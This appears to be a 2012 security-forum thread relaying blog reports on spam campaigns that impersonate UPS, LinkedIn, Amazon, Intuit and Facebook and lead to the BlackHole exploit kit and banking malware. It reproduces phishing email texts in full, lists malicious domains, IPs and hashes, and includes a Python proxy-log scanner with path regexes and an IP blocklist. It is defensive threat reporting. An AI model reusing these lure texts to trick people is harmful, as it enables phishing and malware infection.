> https://webrootblog.files.wordpress.com/2012/09/vodafone_europe_spam_email_malware.png
Detection rate: Vodafone_Account_Balance.pdf.exe – MD5: 8601ece8b0c79ec3d4396f07319bbff1 * ... Trojan-Ransom.Win32.PornoAsset.xen; Worm:Win32/Gamarue.F..."
* https://www.virustotal.com/file/2d625be6491b44c052a4a97fd7c955cb7694021217e977ed40bbfd333a9c470e/analysis/1349008562/
File name: Your_Friend_New_photos-updates.jpeg.exe
Detection ratio: 36/43
Analysis date: 2012-09-30 15:01:54 UTC
___
Fake UPS emails - client-side exploits and malware
- http://blog.webroot.com/2012/10/15/cybercriminals-impersonate-ups-serve-client-side-exploits-and-malware/
Oct 15, 2012 - "... cybercriminals spamvertised millions of email addresses, impersonating UPS, in an attempt to trick end users into viewing the malicious .html attachment. Upon viewing, the file loads a tiny iFrame attempting to serve client-side exploit served by the latest version of the BlackHole Exploit kit, which ultimately drops malware on the affected host.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/ups_spam_email_exploits_malware_black_hole_exploit_kit.png
... Sample detection rate for a malicious .html file found in the spamvertised emails: UPS_N21489880.htm – MD5: 38a2a54d6e7391d7cd00b50ed76b9cfb * ... Trojan.Iframe.BCK; Trojan-Downloader.JS.Iframe.dbh
* https://www.virustotal.com/file/37d801882221dbc8f9da510e9531434ffb63faf61052c0263b658ca227b9a453/analysis/
File name: java.jar
Detection ratio: 26/43
Analysis date: 2012-10-15
... currently responding to the following IPs – 84.22.100.108; 190.10.14.196; 203.80.16.81; 61.17.76.12; 213.135.42.98
... Related malicious domains part of the campaign’s infrastructure:
rumyniaonline .ru – 84.22.100.108
denegnashete .ru – 84.22.100.108
dimabilanch .ru – 84.22.100.108
ioponeslal .ru – 84.22.100.108
moskowpulkavo .ru – 84.22.100.108
omahabeachs .ru – 84.22.100.108
uzoshkins .ru – 84.22.100.108
sectantes-x .ru – 84.22.100.108
... Name servers part of the campaign’s infrastructure:
ns1.denegnashete .ru – 62.76.190.50
ns2.denegnashete .ru – 87.120.41.155
ns3.denegnashete .ru – 132.248.49.112
ns4.denegnashete .ru – 91.194.122.8
ns5.denegnashete .ru – 62.76.188.246
ns6.denegnashete .ru – 178.63.51.54 ..."
___
Rogue Bad Piggies ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/malicious-developers-released-rogue-bad-piggies-versions/
Oct 15, 2012 - "... Right after reports of malicious Bad Piggies on Google Chrome webstore circulated, we found that certain developers also released their own, albeit rogue versions of the said gaming app. On the heels of Bad Piggies‘ launch last month, we saw rogue versions of the game on specific web pages hosted on Russian domains. However, these versions are -not- affiliated at all with the game. Based on our analysis, these apps are verified as malicious, specifically premium service abusers, which send SMS messages without user consent and leave users with unnecessary charges... During our research, we used the keyword “Bad Piggies” and encountered 48 Russian domains. Among these sites is piggies-{BLOCKED}d .ru, which appears as an app download page.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/10/roguebadpiggies_website.jpg
... site offers the said app on different platforms. Instead of the actual Bad Piggies app, users instead download a malicious .APK file detected as ANDROIDOS_FAKEINST.A. Once installed, it creates a shortcut on the device’s homepage and sends SMS messages to specific numbers. As mentioned, these messages are sent without user consent and may cost users extra for something they didn’t authorize... ANDROIDOS_FAKEINST.A has the ability to obfuscate its codes via inserting junk codes and encrypting the strings and decrypting it upon execution. It also replaces all class/method/field name with meaningless strings thus making analysis difficult... Bad Piggies is a spinoff of the highly popular Angry Birds franchise and its release enjoyed good coverage from popular media. Such is also the case with the malicious Instagram and Angry Birds Space... To victimize as many users as possible, shady developers and certain crooks created rogue versions to take advantage of these apps’ popularity and their media exposure. Russian domains also appear to be the favorite among rogue apps developers. Beginning this year up to July, we already blocked more than 6,000 mobile app pages hosted on .RU domains... an increase compared to last year’s 2,946 blocked sites. To lead users to these sites, the people behind these apps spread the links via forum, blog posts or email. To prevent downloading a fake (or worse, a malware disguised as an app) users should stick to legitimate app stores like Google Play..."
___
eBay phishers update branding...
- http://www.gfi.com/blog/ebay-phishers-update-their-branding/
Oct 15, 2012 - "... be aware that not only have eBay updated their logo for the first time since 1995, some scammers have also been quick out of the blocks to rejig their phishing scams and paste in the new logo accordingly. Here’s a scammer who hasn’t quite grasped the concept of “You’re horribly outdated” yet:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/fakebay_new2.jpg
... here’s a scammer who clearly keeps up with the news and probably owns a gold plated yacht and maybe a Unicorn as a result:
> http://www.gfi.com/blog/wp-content/uploads/2012/10/fakebay_new1.jpg
... It probably won’t be long before most (if not all) phishers start using the new logo, but for the time being at least some phish attempts will be a little easier to spot for the average end-user. Of course, avid eBay users can also visit their Security Center* and keep up to date with all the latest shenanigans."
* http://pages.ebay.com/securitycenter/index.html ..."
AplusWebMaster
2012-10-16, 15:28
FYI...
Wire Transfer SPAM / hotsecrete .net
- http://blog.dynamoo.com/2012/10/wire-transfer-spam-hotsecretenet.html
16 Oct 2012 - "This fake wire transfer spam leads to malware on hotsecrete .net:
From: Federal Information System [mailto:highjackingucaf10@atainvest.com]
Sent: 16 October 2012 15:59
Subject: Wire Transfer accepted
We have successfully done the following transfer:
________________________________________
Item #: 35043728
Amount: $16,861.99
To: Anthony Glover
Fee: 29.00
Send on Date: 10/16/2012
Service: Domestic Wire
________________________________________
If there is a problem with processing your request we would report to you both by email and on the Manage Accounts tab. You can always check your transfer status via this link Sincerely,
Federal Reserve Bank Automate Notify System
*********************************************
Email Preferences
This is a service warning from Federal Reserve Bank. Please note that you may receive notification note in accordance with your service agreements, whether or not you elect to receive promotional email.
=============================================
Federal Reserve Bank Email, 8th Floor, 170 Seashore Tryon, Ave., Charlotte, TX 89936-0001 Federal Reserve Bank.
The malicious payload is found at [donotclick]hotsecrete .net/detects/exclude-offices_details_warm.php hosted on 183.81.133.121 (Vodafone, Fiji) which is a well-known malicious IP address that you should block."
___
LinkedIn SPAM / 74.91.112.86
- http://blog.dynamoo.com/2012/10/linkedin-spam-749111286.html
16 Oct 2012 - "This fake LinkedIn spam leads to malware on 74.91.112.86:
From: LinkedIn.Invitations [mailto:1F31A2F6B@delraybeachhomesales.com]
Sent: 16 October 2012 13:50
To: [redacted]
Subject: New invitation is waiting for your response
Hi [redacted],
David sent you an invitation to connect 13 days ago. How would you like to respond?
Accept Ignore Privately
Hilton Suarez
Precision Castparts (Distributor Sales Manager EMEA)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is on [donotclick]74.91.112.86 /links/assure_numb_engineers.php hosted by Nuclearfallout Enterprises in the US (no surprises there)."
___
Facebook SPAM / o.anygutterkings .com
- http://blog.dynamoo.com/2012/10/facebook-spam-oanygutterkingscom.html
15 Oct 2012 - "This fake Facebook spam leads to malware on o.anygutterkings .com:
Date: Mon, 15 Oct 2012 20:02:21 +0200
From: "FB Account"
Subject: Facebook account
facebook
Hi [redacted],
You have blocked your Facebook account. You can reactivate your account whenever you wish by logging into Facebook with your former login email address and password. Subsequently you will be able to take advantage of the site as before
Kind regards,
The Facebook Team
Sign in to Facebook and start connecting ...
Please use the link below to resume your account ...
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
Other subjects are: "Account blocked" and "Account activated"
The payload is at [donotclick]o.anygutterkings .com/links/assure_numb_engineers.php hosted on 198.136.53.38 (Comforthost, US)..."
- http://www.gfi.com/blog/this-spam-gives-recipients-a-second-chance/
Oct 16, 2012 - "... another Blackhole-Zeus-related threat... ignore and delete this Facebook spam..."
> http://www.gfi.com/blog/wp-content/uploads/2012/10/FB_1015.png
___
Intuit SPAM / navisiteseparation .net
- http://blog.dynamoo.com/2012/10/intuit-spam-navisiteseparationnet.html
15 Oct 2012 - "This fake Intuit spam leads to malware on navisiteseparation .net:
Date: Mon, 15 Oct 2012 15:20:13 -0300
From: "Intuit GoPayment" [crouppywo4@deltamar.net]
Subject: Welcome - you're accepted for Intuit GoPayment
Congratulations!
GoPayment Merchant by Intuit request for ONTIMEE ADMINISTRATION, Inc. has been ratified.
GoPayment
Account Number: XXXXXXXXXXXXXX55
Email Address: [redacted]
PLEASE NOTE : Associated charges for this service may be applied now.
Next step: View or confirm your Access ID
This is {LET:User ID lets you:
Review your payment service in the Merchant Center
Review charges
Log In to other Intuit products you may use, like TurboTax, Quicken, and Intuit Payroll
The good news is we found an existing Intuit account for your email address, You can use this ID for your payment service also, or enter a new one.
Verify Access ID
Get started:
Step 1: If you have not still, download the Intuit software.
Step 2: Launch the Intuit application and sign in with the Access ID (your email address) and Password you setup.
Easy Manage Your Intuit GoPayment Account
The GoPayment Merchant Service by Intuit Center is the web site where you can learn more about GoPayment features, customize your sales receipt and add GoPayment users. You can also view transactions, deposits and fees. Visit url and sign in with your GoPayment AccesID (your email address) and Password.
For more information on how to start using GoPayment Merchant by Intuit, including tutorials, FAQs and other resources, visit the Merchant Service Center at service link.
Please don't reply to this message. auto informer system unable to accept incoming messages.
System Terms & Agreements © 2008-2012 Intuit, INC. All rights reserved.
... Sample subjects:
Congrats - you're accepted for Intuit GoPayment Merchant
Congratulations - you're approved for Intuit Merchant
Congrats - you're approved for GoPayment Merchant
Welcome - you're accepted for Intuit GoPayment
The malicious payload is at [donotclick]navisiteseparation .net/detects/processing-details_requested.php hosted on 183.81.133.121 (Vodafone, Fiji). The good news is that the domain has been suspended by the registrar, but that IP address has been used many times recently and should be blocked if you can."
___
Copies of Policies SPAM / linkrdin .ru
- http://blog.dynamoo.com/2012/10/copies-of-policies-spam-linkrdinru.html
15 Oct 2012 - "Another "Copies of Policies" spam, this time leading to malware on linkrdin .ru:
From: [support@victimdomain.com]
Date: 15 October 2012 07:15
Subject: RE: SANTOS - Copies of Policies.
Unfortunately, I cannot obtain electronic copies of the Ocean, Warehouse or EPLI policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
The malicious payload is on [donotclick]linkrdin .ru:8080/forum/links/column.php ... hosted on the same IPs as this spam:
68.67.42.41 (Fibrenoire, Canada)
79.98.27.9 (UAB Interneto Vizija, Lithuania)
203.80.16.81 (MYREN, Malaysia) ..."
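Added example, not from the Dynamoo posts above and not their tooling: the Blackhole landing URLs quoted in this post share a small set of path shapes (":8080/forum/links/column.php", "/links/<word>_<word>_<word>.php", "/detects/<word>-<word>_<word>.php") even as the domains rotate, so a proxy-log sweep can key on the path and on the IPs the posts recommend blocking rather than on hostnames. The log format, the client addresses and the control lines are constructed for the example; the path patterns and the blocklist come from the URLs and IPs quoted above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Landing-page paths quoted in the Dynamoo posts above. The first pattern is
# the fixed ":8080/forum/links/column.php" form; the second covers the
# "/links/assure_numb_engineers.php" and "/detects/exclude-offices_details_warm.php"
# forms: a "links" or "detects" directory, then two to four lowercase words
# joined with "_" or "-", then ".php".
LANDING_PATH_PATTERNS = (
    re.compile(r"^/forum/links/column\.php$"),
    re.compile(r"^/(?:links|detects)/[a-z]+(?:[_-][a-z]+){1,3}\.php$"),
)

# IPs the posts above say should be blocked.
BLOCKED_IPS = frozenset({
    "183.81.133.121",  # hotsecrete.net / navisiteseparation.net
    "74.91.112.86",    # LinkedIn spam, bare-IP URL
    "198.136.53.38",   # o.anygutterkings.com
    "68.67.42.41", "79.98.27.9", "203.80.16.81",  # linkrdin.ru
})

# Constructed proxy log (not real traffic), one request per line:
# <epoch> <client_ip> <dest_ip> <method> <url>
# The last two lines are benign controls. 198.51.100.0/24 and 203.0.113.0/24
# are documentation ranges used for addresses the posts do not mention.
SAMPLE_LOG = """\
1350390000.123 10.0.0.5 183.81.133.121 GET http://hotsecrete.net/detects/exclude-offices_details_warm.php
1350390001.456 10.0.0.7 74.91.112.86 GET http://74.91.112.86/links/assure_numb_engineers.php
1350390002.789 10.0.0.9 198.51.100.7 GET http://linkrdin.ru:8080/forum/links/column.php
1350390003.012 10.0.0.11 203.80.16.81 GET http://some-other-site.example/index.html
1350390004.345 10.0.0.13 203.0.113.10 GET http://example.com/links/about.php
1350390005.678 10.0.0.15 203.0.113.11 GET http://example.com/forum/index.php
"""


def _is_bare_ip(host):
    """True if the URL addresses the server by IP rather than by name."""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def classify(url, dest_ip):
    """Return the reasons a request matches the indicators; empty if none."""
    reasons = []
    parts = urlsplit(url)
    path = parts.path or "/"
    if any(p.match(path) for p in LANDING_PATH_PATTERNS):
        reasons.append("landing-page path")
    if dest_ip in BLOCKED_IPS:
        reasons.append("blocklisted ip")
    if parts.hostname and _is_bare_ip(parts.hostname):
        reasons.append("bare-ip host")
    return reasons


def scan_log(text):
    """Return [(client_ip, url, reasons)] for every line matching an indicator."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        _ts, client, dest, _method, url = line.split(maxsplit=4)
        reasons = classify(url, dest)
        if reasons:
            hits.append((client, url, reasons))
    return hits


if __name__ == "__main__":
    for client, url, reasons in scan_log(SAMPLE_LOG):
        print(f"{client} -> {url}: {', '.join(reasons)}")
```

The path regex is deliberately narrow (a "links" or "detects" directory plus joined dictionary words) so that ordinary CMS paths such as /links/about.php do not trigger; widen it only after checking it against your own proxy history.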
AplusWebMaster
2012-10-17, 14:58
FYI...
Fake American Airlines emails serve BlackHole Exploit kit ...
- http://blog.webroot.com/2012/10/17/american-airlines-themed-emails-lead-to-the-black-hole-exploit-kit/
Oct 17, 2012 - "... cybercriminals launched yet another massive spam campaign, this time impersonating American Airlines in an attempt to trick its customers into clicking on a malicious link found in the mail. Upon clicking on the link, users are exposed to the client-side exploits served by the BlackHole Exploit Kit v2.0...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/american_airlines_spam_email_exploits_malware_black_hole_exploit_kit.png
Spamvertised compromised URL: hxxp ://malorita-hotel .by/wp-config.htm
Detection rate for a sample Java script redirection: American_Airlines.html – MD5: 7b23a4c26b031bef76acff28163a39c5* ...JS/Exploit-Blacole.gc; JS:Blacole-CF [Expl]
Sample client-side exploits serving URL: hxxp ://omahabeachs .ru:8080/forum/links/column.php
We’ve already seen the same malicious email used in the previously profiled “Cybercriminals impersonate -UPS-, serve client-side exploits and malware” campaign, clearly indicating that these campaigns are launched by the same cybercriminal/gang of cybercriminals..."
* https://www.virustotal.com/file/68d4efe09c049d1a41ffe43077658ecf6472ec10aa10354986c8fe45ca6bfb48/analysis/1349016199/
File name: American_Airlines.html
Detection ratio: 9/42
Analysis date: 2012-09-30
___
Fake Amazon emails serve BlackHole Exploit kit ...
- http://blog.webroot.com/2012/10/16/cybercriminals-spamvertise-amazon-shipping-confirmation-themed-emails-serve-client-side-exploits-and-malware/
Oct 16, 2012 - "... cybercriminals have been spamvertising millions of emails impersonating Amazon.com in an attempt to trick customers into thinking that they’ve received a Shipping Confirmation for a Vizio XVT3D04, HD 40-Inch 720p 100 Hz Cinema 3D LED-LCD HDTV FullHD and Four Pairs of 3D Glasses. Once users click on any of the links found in the malicious email, they’re automatically exposed to the client-side exploits served by the latest version of the Black Hole Exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/amazon_email_spam_malware_exploits_black_hole_exploit_kit.png
... Second screenshot of the spamvertised email impersonating Amazon.com Inc:
> https://webrootblog.files.wordpress.com/2012/09/amazon_email_spam_malware_exploits_black_hole_exploit_kit_01.png
Once users click on the links found in the malicious email, they’re presented with the following bogus “Page loading…” page:
> https://webrootblog.files.wordpress.com/2012/09/amazon_email_spam_malware_exploits_black_hole_exploit_kit_02.png
Sample subjects used in the spamvertised emails:
Re: HD TV Waiting on delivery Few hours ago;
Your HDTV Delivered Now;
Re: HDTV Processed Yesterday;
Re: Order Processed Today;
Your Order Approved Few hours ago ...
Sample detection rate for the malicious Java script: Amazon.html – MD5: a8af3b2fba56a23461f2cc97a7b97830* ... JS/Obfuscus.AACB!tr; Trojan-Downloader.JS.Expack.ael
Once a successful client-side exploitation takes place, the BlackHole Exploit kit drops a malicious PDF file with MD5: 9a22573eb991a3780791a2df9c55ddab* that’s exploiting the CVE-2010-0188 vulnerability."
* https://www.virustotal.com/file/47473a71edeec0f5eb50a5b936cb6dc37f9999e130a65bc5d9e251bdf7c5c353/analysis/1349014600/
File name: Amazon.html
Detection ratio: 20/43
Analysis date: 2012-09-30
___
Spoofed WebEx, PayPal Emails lead to Rogue Flash Update
- http://blog.trendmicro.com/trendlabs-security-intelligence/spoofed-webex-paypal-emails-lead-to-rogue-flash-update/
Oct 16, 2012 - "... Last week, we received two spoofed emails that redirect users to a fake Adobe Flash Player update. These messages use different approaches to lure users into downloading the malicious file update_flash_player.exe (detected as TSPY_FAREIT.SMC).
The first email is disguised as a WebEx email containing an HTM attachment. Once users execute this attachment, they are led to a malicious site hosting TSPY_FAREIT.SMC. Employees may be tricked into opening this as it appears to be an alert coming from a business tool they often use...
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/10/FakeWebex_email.jpg
The second sample, on the other hand, is a spoofed PayPal email that features transaction details.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/10/PayPal_phishingemail.jpg
Curious users who click these details are then directed to the webpage hosting the rogue Flash update file... Once executed, TSPY_FAREIT.SMC drops a variant of the infamous banking malware ZeuS/ZBOT, specifically TSPY_ZBOT.AMM and TSPY_ZBOT.LAG. If you may recall, this malware family is known for its information theft routines. These variants are specifically crafted to steal online banking credentials such as usernames, passwords, and other important account details. This stolen information is then used to initiate transactions without users' knowledge or is peddled in the underground market for the right price... The use of WebEx in these spoofed emails is also fishy (phishy?). WebEx is a popular business conference/meeting technology in the corporate world... We believe that the perpetrators of this threat are likely targeting businesses and employees...
Update... We observed a blackhole exploit kit (BHEK) spam run mimicking Facebook notification that leads to the site hosting another rogue Flash Player update (detected as TSPY_FAREIT.AMM) that drops ZeuS/ZBOT variants... expect that such spam runs won’t be fading soon... these attacks are continuing at full speed... users are advised to be continuously extra careful with clicking links on email messages."
AplusWebMaster
2012-10-18, 17:59
FYI...
NY Traffic Ticket SPAM / kennedyana .ru
- http://blog.dynamoo.com/2012/10/ny-traffic-ticket-spam-kennedyanaru.html
18 Oct 2012 - "This fake Traffic Ticket spam leads to malware on kennedyana .ru:
Date: Wed, 17 Oct 2012 03:59:44 +0600
From: sales1@[redacted]
To: [redacted]
Subject: Fwd: NY TRAFFIC TICKET
New-York Department of Motor Vehicles
TRAFFIC TICKET
NEW-YORK POLICE DEPARTMENT
THE PERSON CHARGED AS FOLLOWS
Time: 5:16 AM
Date of Offense: 21/01/2012
SPEED OVER 50 ZONE
TO PLEAD CLICK HERE AND FILL OUT THE FORM
The malicious payload is on [donotclick]kennedyana .ru:8080/forum/links/column.php hosted on the following IPs:
68.67.42.41 (Fibrenoire, Canada)
72.18.203.140 (Las Vegas NV Datacenter, US)
203.80.16.81 (MYREN, Malaysia) ..."
___
Fake Intuit 'Payroll Confirmation inquiry’ emails lead to the BlackHole exploit kit
- http://blog.webroot.com/2012/10/18/intuit-payroll-confirmation-inquiry-themed-emails-lead-to-the-black-hole-exploit-kit/
Oct 18, 2012 - "...two consecutive massive email campaigns, impersonating Intuit Payroll’s Direct Deposit Service system, in an attempt to trick end and corporate users into clicking on the malicious links found in the mails. Upon clicking on -any- of links found in the emails, users are exposed to the client-side exploits served by the latest version of the BlackHole exploit kit...
Sample screenshot of the first spamvertised campaign:
> https://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit.png
Upon clicking on the links found in the malicious emails, users are exposed to the following bogus “Page loading…” screen:
> https://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit_01.png
Screenshots of the second spamvertised campaign:
> https://webrootblog.files.wordpress.com/2012/10/intuit_spam_exploits_black_hole_exploit_kit_02.png
... Both of these malicious domains used to respond to 183.81.133.121; 195.198.124.60; 203.91.113.6. More malicious domains that are part of the campaign’s infrastructure are known to have responded to the same IPs... Detection rate, MD5: 5723f92abf257101be20100e5de1cf6f * ... Gen:Variant.Kazy.96378; Worm.Win32.Cridex.js, MD5: 06c6544f554ea892e86b6c2cb6a1700c ** ... Trojan.Win32.Buzus.mecu; Worm:Win32/Cridex.B..."
* https://www.virustotal.com/file/64e1ae655aafcf83717cb6b678fa2c36d7cfea2f5bc46dcf56d03f280f024bb3/analysis/
File name: contacts.exe
Detection ratio: 17/43
Analysis date: 2012-09-29
** https://www.virustotal.com/file/ee305b8e80ca0e06147909080435a9eec04532d3054e76102dd6750ef132d907/analysis/
File name: virussign.com_06c6544f554ea892e86b6c2cb6a1700c.exe
Detection ratio: 33/43
Analysis date: 2012-10-19
___
Adobe CS4 SPAM / leprasmotra .ru
- http://blog.dynamoo.com/2012/10/adbobe-cs4-spam-leprasmotraru.html
18 Oct 2012 - "This fake Adobe spam leads to malware on leprasmotra.ru:
Date: Thu, 18 Oct 2012 10:00:26 -0300
From: "service@paypal.com" [service@paypal.com]
Subject: Order N04833
Good morning,
You can download your Adobe CS4 License here -
We encourage you to explore its new and enhanced capabilities with these helpful tips, tutorials, and eSeminars.
Thank you for buying Adobe InDesign CS4 software.
Adobe Systems Incorporated
The malicious payload is at [donotclick]leprasmotra .ru:8080/forum/links/column.php hosted on:
72.18.203.140 (Las Vegas NV Datacenter, US)
203.80.16.81 (MYREN, Malaysia)
209.51.221.247 (eNET, US)
Blocking access to those IPs is recommended."
___
LinkedIn SPAM / 64.111.24.162
- http://blog.dynamoo.com/2012/10/linkedin-spam-6411124162.html
17 Oct 2012 - "This fake LinkedIn spam leads to malware on 64.111.24.162:
From: LinkedIn.Invitations [mailto:8B44145D0@bhuna.net]
Sent: 17 October 2012 10:06
Subject: New invitation is waiting for your response
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Alexis Padilla
C.H. Robinson Worldwide (Sales Director)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is at [donotclick]64.111.24.162 /links/assure_numb_engineers.php allocated to Data 102 in the US and then suballocated to:
network:Network-Name:Buzy Bee Hosting /27
network:IP-Network:64.111.24.160/27
network:IP-Network-Block:64.111.24.160 - 64.111.24.191
network:Org-Name:Buzy Bee Hosting
network:Street-Address:1451 North Challenger Dr
network:City:Pueblo West
network:State:CO
network:Postal-Code:81007
network:Country-Code:US
... Blocking the IP (and possibly the /27 block) is probably wise."
___
Amazon.com SPAM / sdqhfckuri .ddns.info and ultjiyzqsh .ddns.info
- http://blog.dynamoo.com/2012/10/amazoncom-spam-sdqhfckuriddnsinfo.html
17 Oct 2012 - "This fake Amazon.com spam leads to malware on sdqhfckuri .ddns.info and ultjiyzqsh .ddns.info:
From: Amazon.Com [mailto:pothooknw@tcsn.net]
Sent: 17 October 2012 06:54
Subject: Your Amazon.com order of "Bulova Men's 94B316 Precisionist Claremont Brown Leather Watch" has shipped!
Importance: High
Gift Cards
| Your Orders
| Amazon.com
Shipping Confirmation
Order #272-3140048-4213404
Hello,
Thank you for shopping with us. We thought you'd like to know that we shipped your gift, and that this completes your order. Your order is on its way, and can no longer be changed. If you need to return an item from this shipment or manage other orders, please visit Your Orders on Amazon.com.
Your estimated delivery date is:
Tuesday, October 9, 2012
Your package is being shipped by UPS and the tracking number is 1ZX305712324670208. Depending on the ship speed you chose, it may take 24 hours for your tracking number to return any information.
Shipment Details
Bulova Men's 94B316 Precisionist Claremont Brown Leather Watch
Sold by Amazon.com LLC (Amazon.com) $109.95
Item Subtotal: $109.95
Shipping & Handling: $0.00
Total Before Tax: $109.95
Shipment Total: $109.95
Paid by Visa: $109.95
Returns are easy. Visit our Online Return Center.
If you need further assistance with your order, please visit Customer Service.
We hope to see you again soon!
Amazon.com
This email was sent from a notification-only address that cannot accept incoming email. Please do not reply to this message.
The malicious payload is at [donotclick]sdqhfckuri .ddns.info/links/calls_already_stopping.php or [donotclick]ultjiyzqsh .ddns.info/links/calls_already_stopping.php hosted on 37.230.117.4 (The First CJSC, Russia).
Added: snfgrhoykdcb.ddns.info and jdrxnlbyweco.ddns.info are also being used in this attack, although they do not resolve at present.
Blocking .ddns.info and .ddns.name domains will probably not spoil your day. Blocking the 37.230.116.0/23 range might not either..."
___
Take a critical look at DNS blocking...
- http://h-online.com/-1731993
18 Oct 2012
AplusWebMaster
2012-10-19, 15:29
FYI...
Fake Facebook direct messages - malware campaign ...
- http://blog.webroot.com/2012/10/19/malware-campaign-spreading-via-facebook-direct-messages-spotted-in-the-wild/
Oct 19, 2012 - "... one of my Facebook friends sent me a direct message indicating that his host has been compromised, and is currently being used to send links to a malicious .zip archive through direct messages to all of his Facebook friends...
Sample screenshot of the spamvertised direct download link:
> https://webrootblog.files.wordpress.com/2012/10/facebook_direct_message_malware_campaign.png
... All of these redirect to hxxp://74.208.231.61 :81/l.php – tomascloud .com – AS8560... user is exposed to a direct download link of Picture15 .JPG .zip.
Detection rate: MD5: dfe23ad3d50c1cf45ff222842c7551ae * ... Trojan.Win32.Bublik.iez; Worm:Win32/Slenfbot..."
* https://www.virustotal.com/file/a6abebeedd82d3dc8817cfe0efb00f95965248f0b7e07393745af89bcc41dc59/analysis/1349355521/
File name: Picture15-JPG.scr
Detection ratio: 20/43
Analysis date: 2012-10-04 ..."
___
LinkedIn SPAM / cowonhorse .co
- http://blog.dynamoo.com/2012/10/linkedin-spam-cowonhorseco.html
19 Oct 2012 - "This fake LinkedIn spam leads to malware on cowonhorse .co:
From: LinkedIn.Invitations [mailto:4843D050@pes.sau48.org]
Sent: Fri 19/10/2012 10:29
Subject: Invitation
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Estelle Garrison
Interpublic Group (Executive Director Marketing PPS)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
==========
From: LinkedIn.Invitations [mailto:43DD0F0@cankopy.com]
Sent: Fri 19/10/2012 11:39
Subject: New invitation
Hi [redacted],
User sent you an invitation to connect 14 days ago. How would you like to respond?
Accept Ignore Privately
Carol Parks
Automatic Data Processing (Divisional Finance Director)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
==========
From: LinkedIn.Invitations [mailto:3A1665D92@leosanches.com]
Sent: Fri 19/10/2012 12:28
Subject: Invitation
Hi [redacted],
User sent you an invitation to connect 6 days ago. How would you like to respond?
Accept Ignore Privately
Rupert Nielsen
O'Reilly Automotive (Head of Non-Processing Infrastructure)
You are receiving Invitation emails. Unsubscribe.
This email was intended for [redacted].
Learn why we included this.
2012, LinkedIn Corporation. 2029 Stierlin Ct. Mountain View, CA 94043, USA
The malicious payload is on [donotclick]cowonhorse .co/links/observe_resources-film.php hosted on 74.91.118.239 (Nuclearfallout Enterprises, US). Nuclearfallout have hosted sites like this several times before..."
___
Fake Friendster emails lead to BlackHole exploit kit
- http://blog.webroot.com/2012/10/19/regarding-your-friendster-password-themed-emails-lead-to-black-hole-exploit-kit/
19 Oct 2012 - "Cybercriminals are currently spamvertising millions of emails, impersonating Friendster, in an attempt to trick its current and prospective users into clicking on a malicious link found in the email. Upon clicking on the link, users are exposed to the client-side exploits served by the latest version of the BlackHole exploit kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/10/friendster_spam_email_social_engineering_malware_exploits_black_hole_exploit_kit.png
... sonatanamore .ru used to respond to the following IPs – 70.38.31.71; 202.3.245.13; 203.80.16.81; 213.251.162.65 ... Sample detection rate for the malicious iFrame loading script: friedster.html – MD5: c444036179aa371aebf9bae3e7cc5eef * ... Exploit.JS.Blacole; Trojan.JS.Iframe.acn
Upon successful client-side exploitation, the campaign drops MD5: 8fa93035ba01238dd7a55c378d1c2e40** on the affected host... Trojan-Ransom.Win32.PornoAsset.aeuz; Worm:Win32/Cridex.E
Upon execution, the sample phones back to 95.142.167.193 :8080/mx/5/A/in..."
* https://www.virustotal.com/file/2d91b913f989e564b59b119728a68256321b28b70feac0655fa2ff27301c8be1/analysis/1349356588/
File name: Friendster.html
Detection ratio: 12/43
Analysis date: 2012-10-04
** https://www.virustotal.com/file/94ffc7b8ac380f0bdb84ec57e3d8f63fedc372b0239f30ede9503b5df35a690d/analysis/
File name: 8fa93035ba01238dd7a55c378d1
Detection ratio: 27/43
Analysis date: 2012-10-05
___
Cisco - Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake UPS Payment Document Attachment E-mail Messages - October 19, 2012
Fake Shipment Notification E-mail Messages - October 19, 2012
Fake Product Quote Request E-mail Messages - October 19, 2012
Fake Changelog E-mail Messages- October 19, 2012
Fake Xerox Scan Attachment E-mail Messages - October 19, 2012
Fake Bill Statement E-mail Messages - October 19, 2012
Fake Bank Transfer Receipt E-mail Messages - October 19, 2012
Fake Payment Slip E-mail Messages - October 19, 2012
Fake Money Transfer Receipt E-mail Messages - October 19, 2012
Fake Purchase Order Confirmation E-mail Messages - October 19, 2012
Fake FedEx Parcel Delivery Failure Notification E-mail Messages - October 19, 2012
Fake Portuguese Health Alert Notification E-mail Messages - October 19, 2012
Fake Payment Slip Confirmation E-mail Message - October 19, 2012 ...
